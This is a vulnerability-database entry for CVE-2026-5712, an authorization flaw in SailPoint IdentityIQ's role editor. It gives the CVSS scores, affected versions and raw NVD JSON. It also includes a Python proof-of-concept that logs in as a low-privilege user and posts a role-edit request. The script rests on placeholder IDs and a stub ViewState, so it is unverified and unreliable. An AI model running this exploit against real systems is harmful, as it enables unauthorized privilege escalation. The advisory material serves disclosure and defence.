Security Vulnerability Report
中文
CVE-2026-5712 CVSS 8.0 HIGH

CVE-2026-5712

Published: 2026-04-29 18:16:05
Last Modified: 2026-05-05 12:48:23

Description

This vulnerability impacts all versions of IdentityIQ and allows an authenticated identity that is the requestor or assignee of a work item to edit the definition of a role without having an assigned capability that would allow role editing.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:sailpoint:identityiq:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sailpoint:identityiq:8.3:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sailpoint:identityiq:8.3:patch1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sailpoint:identityiq:8.3:patch2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sailpoint:identityiq:8.3:patch4:*:*:*:*:*:* - VULNERABLE
SailPoint IdentityIQ 所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # PoC for CVE-2026-5712: SailPoint IdentityIQ Role Editor Incorrect Authorization import requests # Target configuration target_url = "https://identityiq.example.com" login_endpoint = "/identityiq/login.jsp" role_edit_endpoint = "/identityiq/roleEdit.jsf" # Attacker credentials (Low privilege) username = "attacker_user" password = "attacker_pass" session = requests.Session() # 1. Authenticate to get a valid session login_payload = { "username": username, "password": password } session.post(target_url + login_endpoint, data=login_payload) # 2. Exploit: Edit a role definition without authorization # The target role ID and work item ID would need to be gathered via reconnaissance role_id = "c0a80101123456789012345678901234" work_item_id = "c0a80101123456789012345678909999" exploit_payload = { "edit:form": "editForm", "roleEditor:roleName": "Admin_Role_Modified", "roleEditor:id": role_id, "workItemId": work_item_id, # Context of the work item the user is assigned to "javax.faces.ViewState": "state_id_here", # Needs to be valid "btnSave": "Save" } # 3. Send the malicious edit request response = session.post(target_url + role_edit_endpoint, data=exploit_payload) if response.status_code == 200: print("[+] Potential exploitation successful. Check role permissions.") else: print(f"[-] Request failed with status code: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5712", "sourceIdentifier": "[email protected]", "published": "2026-04-29T18:16:05.180", "lastModified": "2026-05-05T12:48:23.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "This vulnerability impacts all versions of IdentityIQ and allows an authenticated identity that is the requestor or assignee of a work item to edit the definition of a role without having an assigned capability that would allow role editing."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sailpoint:identityiq:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.3", "matchCriteriaId": "B7992F80-093D-4277-9AA8-5438ABFBF83B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sailpoint:identityiq:8.3:-:*:*:*:*:*:*", "matchCriteriaId": "1173CC53-CBE5-450C-96BF-8583D1B3D185"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sailpoint:identityiq:8.3:patch1:*:*:*:*:*:*", "matchCriteriaId": "2C0F5E55-5D33-425F-9DA7-49FE66CD84C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sailpoint:identityiq:8.3:patch2:*:*:*:*:*:*", "matchCriteriaId": "1A2FD228-E6DB-49E3-BE3E-1BF9B0434FC0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sailpoint:identityiq:8.3:patch4:*:*:*:*:*:*", "matchCriteriaId": "0652D99D-DC1E-4E22-8E7D-AE080494C50B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sailpoint:identityiq:8.4:-:*:*:*:*:*:*", "matchCriteriaId": "4BC4F08D-A3FB-41F6-8EFD-6F34FBC0F75F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sailpoint:identityiq:8.4:patch1:*:*:*:*:*:*", "matchCriteriaId": "4ECFADA6-BB7B-4228-9434-B92B2FF21481"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sailpoint:identityiq:8.4:patch2:*:*:*:*:*:*", "matchCriteriaId": "A39B1317-37C0-49DA-9207-7B7CBE6EC190"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sailpoint:identityiq:8.5:-:*:*:*:*:*:*", "matchCriteriaId": "01FF7480-9CBA-4283-994C-B2586C2F5F54"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sailpoint:identityiq:8.5:patch1:*:*:*:*:*:*", "matchCriteriaId": "5E0FF783-DAF2-4DDA-A263-DB51101ACAD6"}]}]}], "references": [{"url": "https://www.sailpoint.com/security-advisories/sailpoint-identityiq-role-editor-incorrect-authorization-vulnerability-cve-2026-5712", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}